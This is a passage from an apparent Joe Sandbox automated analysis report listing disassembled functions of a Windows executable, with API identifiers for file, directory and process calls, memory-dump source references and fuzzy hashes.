                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2359106489-0
                                                                                                                                                                                                                                                        • Opcode ID: b1db56c0457af69a1529a8ecbfe86314167c05b0bf6f6c19be2aba948e3cdc26
                                                                                                                                                                                                                                                        • Instruction ID: 8648a2523f9a96e13c23c6d419b6bb96127e5840f4e3b95c91bdf1c8ef901cf3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1db56c0457af69a1529a8ecbfe86314167c05b0bf6f6c19be2aba948e3cdc26
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17311E22E1C74285EBA89B25A4481BD6351FF887B0F742231EE5DC36E5DF7DD4458680
                                                                                                                                                                                                                                                        Function 00007FF606384520 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2244327787-0
                                                                                                                                                                                                                                                        • Opcode ID: 81b122369233d7b8f515bb11307ece11792f2ae8c3e4e6e271921b1ee2b41d44
                                                                                                                                                                                                                                                        • Instruction ID: 8afc5a3ab93a097c94ef7d82e804e517fb2dd1852ce37dd0e12a03ce3f749131
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81b122369233d7b8f515bb11307ece11792f2ae8c3e4e6e271921b1ee2b41d44
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4521AA21E0CB4389EA289F11A40027D67D0FF45B94F346531DA5DC6EA6CFAED8458780
                                                                                                                                                                                                                                                        Function 00007FF60639D0A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: DirectoryInitializeMallocSystem
                                                                                                                                                                                                                                                        • String ID: riched20.dll
                                                                                                                                                                                                                                                        • API String ID: 174490985-3360196438
                                                                                                                                                                                                                                                        • Opcode ID: 30ed311a49e238ceea73ca57b68d7366abba04754796603139c7fee8065bdde5
                                                                                                                                                                                                                                                        • Instruction ID: e5323fc5200f61094219197d623b6a0de0ac400b528391af679bd628cd496ca1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 30ed311a49e238ceea73ca57b68d7366abba04754796603139c7fee8065bdde5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9F06272A18B4182EB14DF20F8542AEB3A0FF84354F502135E58E82BA4EFBDD648CB50
                                                                                                                                                                                                                                                        Function 00007FF606384334 Relevance: 4.6, APIs: 3, Instructions: 114fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2272807158-0
                                                                                                                                                                                                                                                        • Opcode ID: 6b8eb8b94387b8485b01743e86d2fb3528bffe900f4db4cb81d7376aef299a7b
                                                                                                                                                                                                                                                        • Instruction ID: aae1c8fcd93cfad05bbaf935a99f5f9b8aac9acd13d1d727d0f107902f108c9e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6b8eb8b94387b8485b01743e86d2fb3528bffe900f4db4cb81d7376aef299a7b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0341D973A1878686EB148F15E4442A963A1FB847B4F206335DFAD83AE5CFBDD4A18740
                                                                                                                                                                                                                                                        Function 00007FF606381FF8 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2176759853-0
                                                                                                                                                                                                                                                        • Opcode ID: 29206f03e8ea25254ece3d2a72832fd1ea84fd53fe3ace23c817ee81615a60be
                                                                                                                                                                                                                                                        • Instruction ID: 881acb9524a3c4e0481d4d0da6f542ca8d20fcecf1ae60da2b4820f32d59586f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 29206f03e8ea25254ece3d2a72832fd1ea84fd53fe3ace23c817ee81615a60be
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA21B673A28B8581EA188B65E44016EB360FB89BE0F246335EBDD43B95DF7DD181C780
                                                                                                                                                                                                                                                        Function 00007FF606385FF4 Relevance: 4.6, APIs: 3, Instructions: 62COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1203560049-0
                                                                                                                                                                                                                                                        • Opcode ID: b265933569970aa9f88eee972e8007fd8b91439cfa1828cb055f1fca20ce9a43
                                                                                                                                                                                                                                                        • Instruction ID: c921d76990024cb3a2c6216f39333949edddb41f0e6da1d6cdf2966d17198bba
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b265933569970aa9f88eee972e8007fd8b91439cfa1828cb055f1fca20ce9a43
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B213A72B1CB8185EE248B24E44126DA360FF88B98F207230EB9EC26A4DF3DD540C784
                                                                                                                                                                                                                                                        Function 00007FF606385790 Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3118131910-0
                                                                                                                                                                                                                                                        • Opcode ID: df95a73e4d643e9604293c38faa31d47468479eac191cd886206386da3b21c8e
                                                                                                                                                                                                                                                        • Instruction ID: 5da8e8fefbf8024d8ecba02d688eb57d0fdc1c68e552dd886f9ae89dcfa5543e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: df95a73e4d643e9604293c38faa31d47468479eac191cd886206386da3b21c8e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2421B632B28B8181EE148B24E44416AA360FB84BE4F602235EBDEC26A9DF2DD541C780
                                                                                                                                                                                                                                                        Function 00007FF606385890 Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1203560049-0
                                                                                                                                                                                                                                                        • Opcode ID: ef92913312bb73a90d90e731208bb6c0704bd2d73e0e832659789265a95f0d3b
                                                                                                                                                                                                                                                        • Instruction ID: dcdc5e88a02f1b2f4815ad5face6226e29a4041d6d7c791c87d81737f6dd517b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ef92913312bb73a90d90e731208bb6c0704bd2d73e0e832659789265a95f0d3b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F218672A18B8185EA549B28E444169B361FB887B4F602331EAEDC37A5DF7DD541C780
                                                                                                                                                                                                                                                        Function 00007FF6063AF444 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                                        • Opcode ID: 0d5958cce1ab38587c529cfbb209ba956894e29a38315a5b4669c830f79dc8c5
                                                                                                                                                                                                                                                        • Instruction ID: 18a12aada3867cf96503330a273e4ab890f2acfb853567e321c015d0fd95b741
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d5958cce1ab38587c529cfbb209ba956894e29a38315a5b4669c830f79dc8c5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4CE0BF20B18B0686EF5C6B71AD8577923629F85741F24743CC95F87396CE3FA44982D0
                                                                                                                                                                                                                                                        Function 00007FF6063922E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID: vector too long
                                                                                                                                                                                                                                                        • API String ID: 3668304517-2873823879
                                                                                                                                                                                                                                                        • Opcode ID: a7343eee3c490a039372984b75849d01cabdd3500f915569194afc0abc0bdd4f
                                                                                                                                                                                                                                                        • Instruction ID: 3e3bf8e87bf2df44584defe43d36fe76dfceefa08a0f70486fe746f2671baec1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7343eee3c490a039372984b75849d01cabdd3500f915569194afc0abc0bdd4f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8861C472E18B8186E7089B60D8401AD77F4FB85758F206239EA8D87BA5DF7DD490CB90
                                                                                                                                                                                                                                                        Function 00007FF606396D28 Relevance: 3.2, APIs: 2, Instructions: 170COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3668304517-0
                                                                                                                                                                                                                                                        • Opcode ID: 456ef8ad5fd7c51842a77fc0017af3233e47992e66e1eb3dc404b7829346f65c
                                                                                                                                                                                                                                                        • Instruction ID: 4f2dfd1b97fe646cefa2ab97e6f6dab4b708d61bf34cdfc8af3c85d8b9bad36f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 456ef8ad5fd7c51842a77fc0017af3233e47992e66e1eb3dc404b7829346f65c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E071A172F15A5285FE04DB64D8452AC23B6EF41BA8F602231EA2D977D9DE3EE441C390
                                                                                                                                                                                                                                                        Function 00007FF60638491C Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                                                                                                        • Opcode ID: afbb24ce4a808c86d9ab97423e5b5b7dbeb16d4b7f73d0bc2ed342d630b90402
                                                                                                                                                                                                                                                        • Instruction ID: 81788c1f83a52a3425fd251073f767a4ab39179c4c1e7189671a6a6e089ff0ad
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: afbb24ce4a808c86d9ab97423e5b5b7dbeb16d4b7f73d0bc2ed342d630b90402
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84310522B19B978AEE784B29D6406F863D0AF44BD4F342131DE1DC7FA5DE6EE4418380
                                                                                                                                                                                                                                                        Function 00007FF6063947F0 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3587649625-0
                                                                                                                                                                                                                                                        • Opcode ID: 78dcec84b2b2081ffdb456cee5bc94528ec2c7f435e71baf867d0267fc902a63
                                                                                                                                                                                                                                                        • Instruction ID: d7c0e17de5c63463f21ce25db0885e871755b5432190c6577b3c3e819dc4cef8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 78dcec84b2b2081ffdb456cee5bc94528ec2c7f435e71baf867d0267fc902a63
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A41C232F18B8589FB089B68D4413AC73A2EB443A8F206635DE5C93AD9DE7A9141C3D4
                                                                                                                                                                                                                                                        Function 00007FF606381EBC Relevance: 3.1, APIs: 2, Instructions: 83COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Item_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1746051919-0
                                                                                                                                                                                                                                                        • Opcode ID: a9e66eae6c10b7998c2c5de9bd97b12879dcbec8aef09866538b836a72d0f55b
                                                                                                                                                                                                                                                        • Instruction ID: d73bdfaa09d7d4353eb31d8cdf40d7a2b39c890032985c4fc16e6aa648266151
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a9e66eae6c10b7998c2c5de9bd97b12879dcbec8aef09866538b836a72d0f55b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 42310732A1874246EA188B15E4443ADB3A0FF947D0F646235EB9C87BE5DF7DE441C780
